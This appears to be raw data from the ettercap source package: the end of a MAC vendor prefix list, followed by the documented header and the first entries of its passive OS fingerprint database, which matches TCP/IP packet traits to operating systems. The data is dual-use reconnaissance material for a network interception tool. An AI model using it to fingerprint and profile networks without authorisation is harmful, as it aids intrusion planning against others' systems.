INC. 006095 ACCU-TIME SYSTEMS, INC. 00608A CITADEL COMPUTER 006093 VARIAN 00A03F COMPUTER SOCIETY MICROPROCESSOR & MICROPROCESSOR STANDARDS C 00A02D 1394 Trade Association 00A07C TONYANG NYLON CO., LTD. 00A09A NIHON KOHDEN AMERICA 00A093 B/E AEROSPACE, Inc. 00A078 Marconi Communications 00A0BF WIRELESS DATA GROUP MOTOROLA 00A05F BTG Electronics Design BV 00A0CD DR. JOHANNES HEIDENHAIN GmbH 00A0DA INTEGRATED SYSTEMS Technology, Inc. 00A02A TRANCELL SYSTEMS 00A01C NASCENT NETWORKS CORPORATION 00A08F DESKNET SYSTEMS, INC. 00A0CC LITE-ON COMMUNICATIONS, INC. 00A0E6 DIALOGIC CORPORATION 00A04A NISSHIN ELECTRIC CO., LTD. 00A035 CYLINK CORPORATION 00A03D OPTO-22 00A056 MICROPROSS 00A0E1 WESTPORT RESEARCH ASSOCIATES, INC. 00A0B7 CORDANT, INC. 00A026 TELDAT, S.A. 00A023 APPLIED CREATIVE TECHNOLOGY, INC. 00A089 XPOINT TECHNOLOGIES, INC. 00A007 APEXX TECHNOLOGY, INC. 00A047 INTEGRATED FITNESS CORP. 00A032 GES SINGAPORE PTE. LTD. 00A0E3 XKL SYSTEMS CORP. 00A014 CSIR 00A015 WYLE 00A06A Verilink Corporation 00A018 CREATIVE CONTROLLERS, INC. 00A0FE BOSTON TECHNOLOGY, INC. 00A0EB Encore Networks, Inc. 00A07D SEEQ TECHNOLOGY, INC. 00A0D9 CONVEX COMPUTER CORPORATION 00A070 COASTCOM 0020DE JAPAN DIGITAL LABORAT'Y CO.LTD 00200B OCTAGON SYSTEMS CORP. 002094 CUBIX CORPORATION 0020F7 CYBERDATA CORPORATION 0020D7 JAPAN MINICOMPUTER SYSTEMS CO., Ltd. 0020C3 COUNTER SOLUTIONS LTD. 002047 STEINBRECHER CORP. 0020D5 VIPA GMBH 00201A MRV Communications, Inc. 0020F2 Oracle Corporation 0020B8 PRIME OPTION, INC. 0020AD LINQ SYSTEMS 00207D ADVANCED COMPUTER APPLICATIONS 00202F ZETA COMMUNICATIONS, LTD. 00209A THE 3DO COMPANY 002062 SCORPION LOGIC, LTD. 002081 TITAN ELECTRONICS 0020D9 PANASONIC TECHNOLOGIES, INC./MIECO-US 00206F FLOWPOINT CORPORATION 002020 MEGATRON COMPUTER INDUSTRIES PTY, LTD. 00201B NORTHERN TELECOM/NETWORK 0020F3 RAYNET CORPORATION 002090 ADVANCED COMPRESSION TECHNOLOGY, INC. 0020C0 PULSE ELECTRONICS, INC. 00207E FINECOM CO., LTD. 00204E NETWORK SECURITY SYSTEMS, INC. 0020CA DIGITAL OCEAN 002095 RIVA ELECTRONICS 0020FB OCTEL COMMUNICATIONS CORP. 002070 HYNET, LTD. 0020BE LAN ACCESS CORP. 00203F JUKI CORPORATION 0020A9 WHITE HORSE INDUSTRIAL 002096 Invensys 00204A PRONET GMBH 0020FF SYMMETRICAL TECHNOLOGIES 002044 GENITECH PTY LTD 0020EF USC CORPORATION 002030 ANALOG & DIGITAL SYSTEMS 0020AC INTERFLEX DATENSYSTEME GMBH 0020D8 Nortel Networks 002066 GENERAL MAGIC, INC. 002001 DSP SOLUTIONS, INC. 0020BF AEHR TEST SYSTEMS 002053 HUNTSVILLE MICROSYSTEMS, INC. 0020A1 DOVATRON 00C02F OKUMA CORPORATION 00C01E LA FRANCAISE DES JEUX 00C0E1 SONIC SOLUTIONS 002036 BMC SOFTWARE 0020F8 CARRERA COMPUTERS, INC. 00C065 SCOPE COMMUNICATIONS, INC. 00C079 FONSYS CO.,LTD. 00C00F QUANTUM SOFTWARE SYSTEMS LTD. 00C087 UUNET TECHNOLOGIES, INC. 00C006 NIPPON AVIONICS CO., LTD. 00C0A4 UNIGRAF OY 00C029 Nexans Deutschland GmbH - ANS 00C0FA CANARY COMMUNICATIONS, INC. 00C03A MEN-MIKRO ELEKTRONIK GMBH 00C040 ECCI 00C01C INTERLINK COMMUNICATIONS LTD. 00C042 DATALUX CORP. 00C071 AREANEX COMMUNICATIONS, INC. 00C044 EMCOM CORPORATION 00C0E6 Verilink Corporation 00C096 TAMURA CORPORATION 00C04E COMTROL CORPORATION 00C03F STORES AUTOMATED SYSTEMS, INC. 00C036 RAYTECH ELECTRONIC CORP. 00C0A2 INTERMEDIUM A/S 00C053 Aspect Software Inc. 00C0CC TELESCIENCES CO SYSTEMS, INC. 00C0CE CEI SYSTEMS & ENGINEERING PTE 00404F SPACE & NAVAL WARFARE SYSTEMS 00408F WM-DATA MINFO AB 0040D7 STUDIO GEN INC. 004057 LOCKHEED - SANDERS 004017 Silex Technology America 00C0D9 QUINTE NETWORK CONFIDENTIALITY 00C0B1 GENIUS NET CO. 00C0D2 SYNTELLECT, INC. 00C07E KUBOTA CORPORATION ELECTRONIC 00C0DD QLogic Corporation 00C01B SOCKET COMMUNICATIONS, INC. 00406F SYNC RESEARCH INC. 0040F3 NETCOR 00404B MAPLE COMPUTER SYSTEMS 004033 ADDTRON TECHNOLOGY CO., LTD. 00C08E NETWORK INFORMATION TECHNOLOGY 00C0C7 SPARKTRUM MICROSYSTEMS, INC. 00C0C4 COMPUTER OPERATIONAL 00C012 NETSPAN CORPORATION 0040AD SMA REGELSYSTEME GMBH 00406D LANCO, INC. 0040CD TERA MICROSYSTEMS, INC. 0040F5 OEM ENGINES 004039 OPTEC DAIICHI DENKO CO., LTD. 004079 JUKO MANUFACTURE COMPANY, LTD. 00C020 ARCO ELECTRONIC, CONTROL LTD. 00C0E7 FIBERDATA AB 00C05F FINE-PAL COMPANY LIMITED 0040AE DELTA CONTROLS, INC. 0040F6 KATRON COMPUTERS INC. 004086 MICHELS & KLEBERHOFF COMPUTER 004092 ASP COMPUTER PRODUCTS, INC. 004068 EXTENDED SYSTEMS 004078 WEARNES AUTOMATION PTE LTD 0040F4 CAMEO COMMUNICATIONS, INC. 0040B4 NEXTCOM K.K. 0040B0 BYTEX CORPORATION, ENGINEERING 0080D9 EMK Elektronik GmbH & Co. KG 004059 YOSHIDA KOGYO K. K. 004095 R.P.T. INTERGROUPS INT'L LTD. 004035 OPCOM 00405C FUTURE SYSTEMS, INC. 004061 DATATECH ENTERPRISES CO., LTD. 00008C Alloy Computer Products (Australia) Pty Ltd 0040B9 MACQ ELECTRONIQUE SA 0040BB GOLDSTAR CABLE CO., LTD. 0040B1 CODONICS INC. 0040F8 SYSTEMHAUS DISCOM 0040D2 PAGINE CORPORATION 004024 COMPAC INC. 0040E9 ACCORD SYSTEMS, INC. 004003 Emerson Process Management Power & Water Solutions, Inc. 004090 ANSEL COMMUNICATIONS 0040C5 MICOM COMMUNICATIONS INC. 004020 CommScope Inc 004048 SMD INFORMATICA S.A. 00407C QUME CORPORATION 00407F FLIR Systems 00402D HARRIS ADACOM CORPORATION 0080A6 REPUBLIC TECHNOLOGY, INC. 0040DE Elsag Datamat spa 0040C9 NCUBE 008032 ACCESS CO., LTD. 0080CF EMBEDDED PERFORMANCE INC. 008090 MICROTEK INTERNATIONAL, INC. 004044 QNIX COMPUTER CO., LTD. 0080C4 DOCUMENT TECHNOLOGIES, INC. 00805B CONDOR SYSTEMS, INC. 008043 NETWORLD, INC. 0040DF DIGALOG SYSTEMS, INC. 004009 TACHIBANA TECTRON CO., LTD. 0040A0 GOLDSTAR CO., LTD. 0040FC IBR COMPUTER TECHNIK GMBH 0080AF ALLUMER CO., LTD. 008084 THE CLOUD INC. 0080F3 SUN ELECTRONICS CORP. 008099 Eaton Industries GmbH 00808D WESTCOAST TECHNOLOGY B.V. 0080BE ARIES RESEARCH 008015 SEIKO SYSTEMS, INC. 0080D2 SHINNIHONDENKO CO., LTD. 008089 TECNETICS (PTY) LTD. 00806F ONELAN LTD. 008081 KENDALL SQUARE RESEARCH CORP. 00809C LUXCOM, INC. 008065 CYBERGRAPHIC SYSTEMS PTY LTD. 008019 DAYNA COMMUNICATIONS, INC. 008050 ZIATECH CORPORATION 0080A4 LIBERTY ELECTRONICS 0080CD MICRONICS COMPUTER, INC. 008003 HYTEC ELECTRONICS LTD. 008052 TECHNICALLY ELITE CONCEPTS 00805D CANSTAR 00804F DAIKIN INDUSTRIES, LTD. 008005 CACTUS COMPUTER INC. 00806D CENTURY SYSTEMS CORP. 008094 ALFA LAVAL AUTOMATION AB 000041 ICE CORPORATION 000086 MEGAHERTZ CORPORATION 000092 COGENT DATA TECHNOLOGIES 000058 RACORE COMPUTER PRODUCTS INC. 008074 FISHER CONTROLS 008030 NEXUS ELECTRONICS 000055 COMMISSARIAT A L`ENERGIE ATOM. 0080C9 ALBERTA MICROELECTRONIC CENTRE 00800C VIDECOM LIMITED 00807D EQUINOX SYSTEMS INC. 008063 Hirschmann Automation and Control GmbH 0080EE THOMSON CSF 00808E RADSTONE TECHNOLOGY 008096 HUMAN DESIGNED SYSTEMS, INC. 0080DA Bruel & Kjaer Sound & Vibration Measurement A/S 00803E SYNERNETICS 0080CE BROADCAST TELEVISION SYSTEMS 00801A BELL ATLANTIC 0080DE GIPSI S.A. 008002 SATELCOM (UK) LTD 008064 WYSE TECHNOLOGY LLC 008048 COMPEX INCORPORATED 008085 H-THREE SYSTEMS CORPORATION 00804C CONTEC CO., LTD. 00808F C. ITOH ELECTRONICS, INC. 000052 Intrusion.com, Inc. 0080FF SOC. DE TELEINFORMATIQUE RTC 0000F7 YOUTH KEEP ENTERPRISE CO LTD 0000C7 ARIX CORPORATION 0000D1 ADAPTEC INCORPORATED 000016 DU PONT PIXEL SYSTEMS . 0000E1 GRID SYSTEMS 000081 Bay Networks 000029 IMC NETWORKS CORP. 00000A OMRON TATEISI ELECTRONICS CO. 00000D FIBRONICS LTD. 000024 CONNECT AS 000067 SOFT * RITE, INC. 0000D2 SBE, INC. 000037 OXFORD METRICS LIMITED 0000FB RECHNER ZUR KOMMUNIKATION 0000E2 ACER TECHNOLOGIES CORP. 0000BA SIIG, INC. 00002A TRW - SEDD/INP 00002C AUTOTOTE LIMITED 000083 TADPOLE TECHNOLOGY PLC 0000F3 GANDALF DATA LIMITED 0000B0 RND-RAD NETWORK DEVICES 0000CF HAYES MICROCOMPUTER PRODUCTS 000056 DR. B. STRUCK 00006C Private 0000A9 NETWORK SYSTEMS CORP. 0000EF KTI 000025 RAMTEK CORP. 0000AF Canberra Industries, Inc. 000076 ABEKAS VIDEO SYSTEM 080055 STANFORD TELECOMM. INC. 080053 MIDDLE EAST TECH. UNIVERSITY 08008E Tandem Computers 080084 TOMEN ELECTRONICS CORP. 080085 ELXSI 080082 VERITAS SOFTWARE 080080 AES DATA INC. 080077 TSL COMMUNICATIONS LTD. 080074 CASIO COMPUTER CO. LTD. 08006E MASSCOMP 080068 RIDGE COMPUTERS 080063 PLESSEY 08007B SANYO ELECTRIC CO. LTD. 08007C VITALINK COMMUNICATIONS CORP. 0000DF BELL & HOWELL PUB SYS DIV 0000F9 QUOTRON SYSTEMS INC. 080060 INDUSTRIAL NETWORKING INC. 08004C HYDRA COMPUTER SYSTEMS INC. 080047 SEQUENT COMPUTER SYSTEMS INC. 08004A BANYAN SYSTEMS INC. 080044 DAVID SYSTEMS INC. 080041 RACAL-MILGO INFORMATION SYS.. 080037 FUJI-XEROX CO. LTD. 080035 MICROFIVE CORPORATION 080032 TIGAN INCORPORATED 08008D XYVISION INC. 080015 STC BUSINESS SYSTEMS 080042 JAPAN MACNICS CORP. 080066 AGFA CORPORATION 080004 CROMEMCO INCORPORATED 0001C8 CONRAD CORP. 08003F FRED KOSCHARA ENTERPRISES 08000B UNISYS CORPORATION 00DD01 UNGERMANN-BASS INC. 00DD06 UNGERMANN-BASS INC. AA0003 DIGITAL EQUIPMENT CORPORATION 000000 XEROX CORPORATION 080021 3M COMPANY 02BB01 OCTOTHORPE CORP. 08008A PerfTech, Inc. 00003E SIMPACT 00DD02 UNGERMANN-BASS INC. 00DD04 UNGERMANN-BASS INC. 026086 LOGIC REPLACEMENT TECH. LTD. 080030 CERN 74DA88 TP-LINK TECHNOLOGIES CO.,LTD. CC32E5 TP-LINK TECHNOLOGIES CO.,LTD. 1C3BF3 TP-LINK TECHNOLOGIES CO.,LTD. 3C86D1 vivo Mobile Communication Co., Ltd. 301B97 Lierda Science & Technology Group Co.,Ltd 2CD2E3 Guangzhou Aoshi Electronic Co.,Ltd 1459C3 Creative Chips GmbH A0D86F ARGO AI, LLC E4671E SHEN ZHEN NUO XIN CHENG TECHNOLOGY co., Ltd. 682719 Microchip Technology Inc. 24C17A BEIJING IACTIVE NETWORK CO.,LTD 1C9C8C Juniper Networks A4C939 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 34D772 Xiamen Yudian Automation Technology Co., Ltd C0DCDA Samsung Electronics Co.,Ltd 04B429 Samsung Electronics Co.,Ltd 48794D Samsung Electronics Co.,Ltd 44F971 SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 18F9C4 BAE Systems 60ABD2 Bose Corporation F0EF86 Google, Inc. E4C0CC China Mobile Group Device Co.,Ltd. 5CB13E Sagemcom Broadband SAS F4E5F2 HUAWEI TECHNOLOGIES CO.,LTD 541310 HUAWEI TECHNOLOGIES CO.,LTD 8CE5EF HUAWEI TECHNOLOGIES CO.,LTD A4CD23 Shenzhenshi XinzhongxinCo., Ltd B83A5A Aruba, a Hewlett Packard Enterprise Company E4AAEA Liteon Technology Corporation A0946A Shenzhen XGTEC Technology Co,.Ltd. 1C2AA3 Shenzhen HongRui Optical Technology Co., Ltd. 388E7A AUTOIT 4C710C Cisco Systems, Inc 4C710D Cisco Systems, Inc 9C31C3 BSkyB Ltd 6C24A6 vivo Mobile Communication Co., Ltd. 9C5F5A GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD E447B3 zte corporation FCDB21 SAMSARA NETWORKS INC 607771 Texas Instruments D8CF89 Beijing DoSee Science and Technology Co., Ltd. 04AAE1 BEIJING MICROVISION TECHNOLOGY CO.,LTD 44DC4E ITEL MOBILE LIMITED 382A19 Technica Engineering GmbH 74D654 GINT B4E8C9 XADA Technologies 7C210E Cisco Systems, Inc 942DDC Samsung Electronics Co.,Ltd 54F294 Huawei Device Co., Ltd. 245AB5 Samsung Electronics Co.,Ltd C0D2DD Samsung Electronics Co.,Ltd AC1E92 Samsung Electronics Co.,LTD 0068EB HP Inc. 7CB37B Qingdao Intelligent&Precise Electronics Co.,Ltd. 484C86 Huawei Device Co., Ltd. 88123D Suzhou Aquila Solutions Inc. 48210B PEGATRON CORPORATION A01C8D HUAWEI TECHNOLOGIES CO.,LTD 7C310E Cisco Systems, Inc F4DEAF HUAWEI TECHNOLOGIES CO.,LTD 60123C HUAWEI TECHNOLOGIES CO.,LTD 48A5E7 Nintendo Co.,Ltd 082CB6 Apple, Inc. F84E73 Apple, Inc. B4265D Taicang T&W Electronics F07807 Apple, Inc. 3CCD36 Apple, Inc. D4B709 zte corporation 38144E Fiberhome Telecommunication Technologies Co.,LTD ACBD0B Leimac Ltd. E0CCF8 Xiaomi Communications Co Ltd 98524A Technicolor CH USA Inc. 3868A4 Samsung Electronics Co.,LTD B4A5AC GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 1C784E China Mobile Iot Limited company 843E79 Shenzhen Belon Technology CO.,LTD B81904 Nokia Shanghai Bell Co., Ltd. F4A59D Huawei Device Co., Ltd. E0F442 Huawei Device Co., Ltd. F0C42F Huawei Device Co., Ltd. C0B47D Huawei Device Co., Ltd. 444687 Realme Chongqing MobileTelecommunications Corp Ltd E82689 Aruba, a Hewlett Packard Enterprise Company 20F375 ARRIS Group, Inc. 84BB69 ARRIS Group, Inc. 105FD4 Tendyron Corporation 8CE38E Kioxia Corporation A0B439 Cisco Systems, Inc A4B439 Cisco Systems, Inc 001038 Micro Research Ltd. E81B4B amnimo Inc. CCF411 Google, Inc. 9C2DCF Shishi Tongyun Technology(Chengdu)Co.,Ltd. 9424B8 GREE ELECTRIC APPLIANCES, INC. OF ZHUHAI C803F5 Ruckus Wireless 000D0A Barco Projection Systems NV C467D1 HUAWEI TECHNOLOGIES CO.,LTD 9C8ACB Juniper Networks C8C465 HUAWEI TECHNOLOGIES CO.,LTD 1C4363 HUAWEI TECHNOLOGIES CO.,LTD 94292F New H3C Technologies Co., Ltd D49AA0 VNPT TECHNOLOGY F80FF9 Google, Inc. 8C5AC1 Huawei Device Co., Ltd. A85AE0 Huawei Device Co., Ltd. A4B61E Huawei Device Co., Ltd. C4FE5B GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD C03937 GREE ELECTRIC APPLIANCES, INC. OF ZHUHAI B44C3B Zhejiang Dahua Technology Co., Ltd. 40A2DB Amazon Technologies Inc. 4C6C13 IoT Company Solucoes Tecnologicas Ltda A885D7 Sangfor Technologies Inc. 444ADB Apple, Inc. 84F883 Luminar Technologies 9CA513 Samsung Electronics Co.,Ltd 1039E9 Juniper Networks 309048 Apple, Inc. D41F0C JAI Manufacturing C8FA84 Trusonus corp. C402E1 Khwahish Technologies Private Limited F85B3B ASKEY COMPUTER CORP 786DEB GE Lighting 88E9A4 Hewlett Packard Enterprise 2863BD APTIV SERVICES US, LLC 1C721D Dell Inc. F41C95 BEIJING YUNYI TIMES TECHNOLOGY CO,.LTD A0687E ARRIS Group, Inc. A8705D ARRIS Group, Inc. 546503 Quectel Wireless Solutions Co., Ltd. 9C9789 1MORE F0463B Comcast Cable Corporation 1C05B7 Chongqing Trantor Technology Co., Ltd. 000EF3 Smartlabs, Inc. A043B0 Hangzhou BroadLink Technology Co.,Ltd 74ACB9 Ubiquiti Networks Inc. F492BF Ubiquiti Networks Inc. D8C561 CommFront Communications Pte Ltd 0C29EF Dell Inc. 60D89C HMD Global Oy B4C9B9 Sichuan AI-Link Technology Co., Ltd. F82E8E Nanjing Kechen Electric Co., Ltd. 68D79A Ubiquiti Networks Inc. 1C63BF SHENZHEN BROADTELTELECOM CO.,LTD AC3651 Jiangsu Hengtong Terahertz Technology Co., Ltd. 684A76 eero inc. 688FC9 Zhuolian (Shenzhen) Communication Co., Ltd F08175 Sagemcom Broadband SAS D84732 TP-LINK TECHNOLOGIES CO.,LTD. B46E08 HUAWEI TECHNOLOGIES CO.,LTD 8C683A HUAWEI TECHNOLOGIES CO.,LTD B48107 SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD 706655 AzureWave Technology Inc. 2864B0 Huawei Device Co., Ltd. 04F169 Huawei Device Co., Ltd. 5021EC Huawei Device Co., Ltd. 0C48C6 CELESTICA INC. 005E0C HMD Global Oy A42985 Sichuan AI-Link Technology Co., Ltd. 647C34 Ubee Interactive Co., Limited 6C38A1 Ubee Interactive Co., Limited 78530D Shenzhen SkyworthDigitalTechnologyCO., Ltd B8D4E7 Aruba, a Hewlett Packard Enterprise Company BC0963 Apple, Inc. D84C90 Apple, Inc. 24D0DF Apple, Inc. 6C4A85 Apple, Inc. 28F033 Apple, Inc. 185869 Sailer Electronic Co., Ltd BC2DEF Realme Chongqing Mobile Telecommunications Corp.,Ltd. 78AC44 Dell Inc. 98C8B8 vivo Mobile Communication Co., Ltd. 7881CE China Mobile Iot Limited company 445CE9 Samsung Electronics Co.,Ltd C01692 China Mobile Group Device Co.,Ltd. 209EF7 Extreme Networks, Inc. BCFF21 Smart Code(shenzhen)Technology Co.,Ltd 381730 Ulrich Lippert GmbH & Co KG 28E34E HUAWEI TECHNOLOGIES CO.,LTD 402E71 Texas Instruments 7076DD OxyGuard Internation A/S E023FF Fortinet, Inc. 8C59DC ASR Microelectronics (Shanghai) Co., Ltd. 18828C Arcadyan Corporation 94E9EE Huawei Device Co., Ltd. 78B8D6 Zebra Technologies Inc. D452EE BSkyB Ltd F490CB IEEE Registration Authority 9CF029 Integrated Device Technology (Malaysia) Sdn. Bhd. 2856C1 Harman/Becker Automotive Systems GmbH 4CFCAA Tesla,Inc. 10CE45 Miromico AG BC4A56 Cisco Systems, Inc F8AF05 Huawei Device Co., Ltd. B82FCB CMS Electracom 6C61F4 SFR 00107F CRESTRON ELECTRONICS, INC. 001B85 MAN Energy Solutions CCAB2C HUMAX Co., Ltd. 5859C2 Extreme Networks, Inc. 787D53 Extreme Networks, Inc. 7C95B1 Extreme Networks, Inc. 786D94 Palo Alto Networks 58493B Palo Alto Networks 001B17 Palo Alto Networks 2443E2 DASAN Network Solutions A86ABB Sagemcom Broadband SAS EC6881 Palo Alto Networks 540E2D vivo Mobile Communication Co., Ltd. 708F47 vivo Mobile Communication Co., Ltd. 24E124Xiamen Ursalink Technology Co., Ltd. A0FF70 Technicolor CH USA Inc. 6C6D09 Kyowa Electronics Co.,Ltd. 90173F HUAWEI TECHNOLOGIES CO.,LTD 607ECD HUAWEI TECHNOLOGIES CO.,LTD 8C7CFF Brocade Communications Systems LLC 889471 Brocade Communications Systems LLC 78A6E1 Brocade Communications Systems LLC 80CFA2 Huawei Device Co., Ltd. 0094EC Huawei Device Co., Ltd. 548ABA Cisco Systems, Inc 080342 Palo Alto Networks C80739 NAKAYO Inc EC4F82 Calix Inc. 44657F Calix Inc. 487746 Calix Inc. EC6CB5 zte corporation C0B101 zte corporation A45006 SHENZHEN HUACHUANG SHIDAI TECHNOLOGYCO.,LTD C87125 Johnson Outdoors Marine Electronics d/b/a Minnkota 686DBC Hangzhou Hikvision Digital Technology Co.,Ltd. AC3C8E Flextronics Computing(Suzhou)Co.,Ltd. 74452D Huawei Device Co., Ltd. 406234 Telink Semiconductor (Shanghai) Co., Ltd. FC3DA5 Arcadyan Corporation BC33AC Silicon Laboratories F05501 Huawei Device Co., Ltd. 140152 Samsung Electronics Co.,Ltd 7CF2DD Vence Corp 94FBA7 IEEE Registration Authority 988E79 Qudelix, Inc. C03EBA Dell Inc. 1CFF59 Sichuan Tianyi Comheart Telecom Co., Ltd. 98F621 Xiaomi Communications Co Ltd C0395A Zhejiang Dahua Technology Co., Ltd. 2064CB GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 1413FB HUAWEI TECHNOLOGIES CO.,LTD D0768F Calix Inc. A49340 Beijing Supvan Information Technology Co.,Ltd. F8E877 Harman/Becker Automotive Systems GmbH A09B12 China Mobile IOT Company Limited 940853 Liteon Technology Corporation B49E80 Sichuan Changhong Electric Ltd. 00E0B7 Cosworth Electronics Ltd 74AB93 Blink by Amazon E87F95 Apple, Inc. 88C08B Apple, Inc. 00E22C China Mobile Group Device Co.,Ltd. 74A7EA Amazon Technologies Inc. 781100 Quantumsolution 4C7CD9 Apple, Inc. 7CB27D Intel Corporate 04ED33 Intel Corporate 5C80B6 Intel Corporate 84C5A6 Intel Corporate AC675D Intel Corporate F8E4E3 Intel Corporate 38DEAD Intel Corporate D46D6D Intel Corporate B46921 Intel Corporate 98063C Samsung Electronics Co.,Ltd 7CA96B Syrotech Networks. Ltd. F8F21E Intel Corporate A4C3F0 Intel Corporate 5076AF Intel Corporate F0D7AF IEEE Registration Authority D84F37 Proxis, spol. s r.o. AC1203 Intel Corporate DC1BA1 Intel Corporate 5CA5BC eero inc. 0433C2 Intel Corporate C858C0 Intel Corporate 64BC58 Intel Corporate 6CCE44 1MORE B0761B HUAWEI TECHNOLOGIES CO.,LTD A41162 Arlo Technology 84EAED Roku, Inc 08B0A7 Truebeyond Co., Ltd 98C97C Shenzhen iComm Semiconductor CO,LTD DC91BF Amazon Technologies Inc. C06369 BINXIN TECHNOLOGY(ZHEJIANG) LTD. 1841FE Digital 14 18AB1D Samsung Electronics Co.,Ltd BCE92F HP Inc. 8437D5 Samsung Electronics Co.,Ltd 3482C5 Samsung Electronics Co.,Ltd E092A7 Feitian Technologies Co., Ltd 001D05 Cooper Lighting Solutions 3C846A TP-LINK TECHNOLOGIES CO.,LTD. 84D81B TP-LINK TECHNOLOGIES CO.,LTD. 7C2ADB Xiaomi Communications Co Ltd 8C0E60 Nanjing Juplink Intelligent Technologies Co., Ltd. 340A33 D-Link International 24A160 Espressif Inc. DCAEEB Ruckus Wireless E8A245 Juniper Networks 882949 Renesas Electronics (Penang) Sdn. Bhd. F864B8 zte corporation 145120 Huawei Device Co., Ltd. C0D193 Huawei Device Co., Ltd. 7804E3 Huawei Device Co., Ltd. A43B0E Huawei Device Co., Ltd. 1C3D2F HUAWEI TECHNOLOGIES CO.,LTD EC753E HUAWEI TECHNOLOGIES CO.,LTD 909164 ChongQing Lavid Technology Co., Ltd. ECDB86 API-K 2481C7 Huawei Device Co., Ltd. FC862A Huawei Device Co., Ltd. 083869 Hong Kong AMobile Intelligent Corp. Limited Taiwan Branch D89ED4 Fiberhome Telecommunication Technologies Co.,LTD AC9572 Jovision Technology Co., Ltd. 00CBBD Cambridge Broadband Networks Group 4843DD Amazon Technologies Inc. 5894A2 KETEK GmbH 0019F5 Imagination Technologies Ltd 40D25F ITEL MOBILE LIMITED 840328 Juniper Networks 089BB9 Nokia 001CFC Sumitomo Electric Industries, Ltd 001636 Quanta Computer Inc. 54F15F Sichuan AI-Link Technology Co., Ltd. E079C4 iRay Technology Company Limited 884067 infomark A8032A Espressif Inc. D8EF42 Huawei Device Co., Ltd. 80CC12 Huawei Device Co., Ltd. 18AA0F Huawei Device Co., Ltd. 54D9C6 Huawei Device Co., Ltd. 308AF7 Huawei Device Co., Ltd. 64E7D8 Samsung Electronics Co.,Ltd AC9A96 Maxlinear, Inc 4C2219 YUANFUDAO HK LIMTED 00E406 HUAWEI TECHNOLOGIES CO.,LTD 44227C HUAWEI TECHNOLOGIES CO.,LTD CCB182 HUAWEI TECHNOLOGIES CO.,LTD 48902F LG Electronics (Mobile Communications) B0A460 Intel Corporate 1C28AF Aruba, a Hewlett Packard Enterprise Company E4246C Zhejiang Dahua Technology Co., Ltd. E8EB1B Microchip Technology Inc. 28C21F SAMSUNG ELECTRO-MECHANICS(THAILAND) 68D6ED GooWi Wireless Technology Co., Limited 941700 Xiaomi Communications Co Ltd 840283 HUMAX Co., Ltd. 8C7086 Gesellschaft für Sonder-EDV-Anlagen mbH F4BFA8 Juniper Networks 28B77C IEEE Registration Authority 400634 Huawei Device Co., Ltd. C42B44 Huawei Device Co., Ltd. F8A26D CANON INC. 5C7D7D Technicolor CH USA Inc. 7061EE Sunwoda Electronic Co.,Ltd B07D64 Intel Corporate C0619A IEEE Registration Authority 74427F AVM Audiovisuelles Marketing und Computersysteme GmbH 74F9CA Nintendo Co.,Ltd 689E0B Cisco Systems, Inc 004238 Intel Corporate 50C68E Biwin Semiconductor (HK) Company Limted 04E795 HUAWEI TECHNOLOGIES CO.,LTD 143FC3 SnapAV 209A7D Sagemcom Broadband SAS A0D0DC Amazon Technologies Inc. 80CA4B SHENZHEN GONGJIN ELECTRONICS CO.,LTD 102779 Sadel S.p.A. ettercap-0.8.3.1/share/etter.finger.os000664 000000 000000 00000251260 13711276346 017531 0ustar00rootroot000000 000000 ############################################################################ # # # ettercap -- etter.finger.os -- passive OS fingerprint database # # # # Copyright (C) 2001-2004 ALoR & NaGA # # # # This program is free software; you can redistribute it and/or modify # # it under the terms of the GNU General Public License as published by # # the Free Software Foundation; either version 2 of the License, or # # (at your option) any later version. # # # ############################################################################ # # # Total entries : 1765 # # # ############################################################################ # # # The fingerprint database has the following structure: # # # # WWWW:MSS:TTL:WS:S:N:D:T:F:LEN:OS # # # # WWWW: 4 digit hex field indicating the TCP Window Size # # MSS : 4 digit hex field indicating the TCP Option Maximum Segment Size # # if omitted in the packet or unknown it is "_MSS" # # TTL : 2 digit hex field indicating the IP Time To Live # # WS : 2 digit hex field indicating the TCP Option Window Scale # # if omitted in the packet or unknown it is "WS" # # S : 1 digit field indicating if the TCP Option SACK permitted is true # # N : 1 digit field indicating if the TCP Options contain a NOP # # D : 1 digit field indicating if the IP Don't Fragment flag is set # # T : 1 digit field indicating if the TCP Timestamp is present # # F : 1 digit ascii field indicating the flag of the packet # # S = SYN # # A = SYN + ACK # # LEN : 2 digit hex field indicating the length of the packet # # if irrilevant or unknown it is "LT" # # OS : an ascii string representing the OS # # # # IF YOU FIND A NEW FINGERPRINT, PLEASE MAIL IT US WITH THE RESPECTIVE OS # # or use the ettercap with submit_fingerprint = 1 in etter.conf # # www.ettercap-project.org/fingerprint.php # # # # # ############################################################################ 0000:05B4:80:WS:0:0:1:0:S:2C:Novell netware 5.00 0000:_MSS:80:WS:0:0:0:0:A:LT:3Com Access Builder 4000 7.2 0000:_MSS:FF:WS:0:0:0:0:A:28:Windows XP 0008:_MSS:40:WS:0:0:0:0:S:28:Red Hat Linux 7.2 Kernel 2.4.7-10 0010:_MSS:40:WS:0:0:0:0:S:28:Gentoo Linux (Kernel 2.6.6-rc1) 0017:05B4:40:00:0:1:0:1:A:3C:Gestetner printer 0040:_MSS:80:WS:0:0:0:0:A:LT:Gold Card Ethernet Interface Firm. Ver. 3.19 (95.01.16) 0046:_MSS:80:WS:0:0:0:0:A:LT:Cyclades PathRouter 0096:_MSS:80:WS:0:0:0:0:A:LT:Cyclades PathRouter V 1.2.4 0100:0218:FF:WS:0:0:0:0:A:2C:Allied Hub 0100:_MSS:80:WS:0:0:0:0:A:LT:Allied Telesyn AT-S10 version 3.0 on an AT-TS24TR hub 0100:_MSS:80:WS:0:0:1:0:A:LT:Xyplex Network9000 0109:0109:40:00:0:1:0:1:A:3C:Debian Potato (2.2), Linux 2.2.17 0200:0000:40:WS:0:0:0:0:S:LT:Linux 2.0.35 - 2.0.37 0200:0200:40:00:0:1:0:0:A:30:Linux 0200:0200:40:WS:0:0:0:0:A:2C:Ascend MAX 1800 0200:05B4:40:00:0:0:0:0:S:2C:Linux 2.0.35 - 2.0.38 0200:05B4:40:00:0:0:0:0:S:LT:Linux 2.0.38 0200:05B4:40:34:0:0:0:0:S:LT:Linux 2.0.33 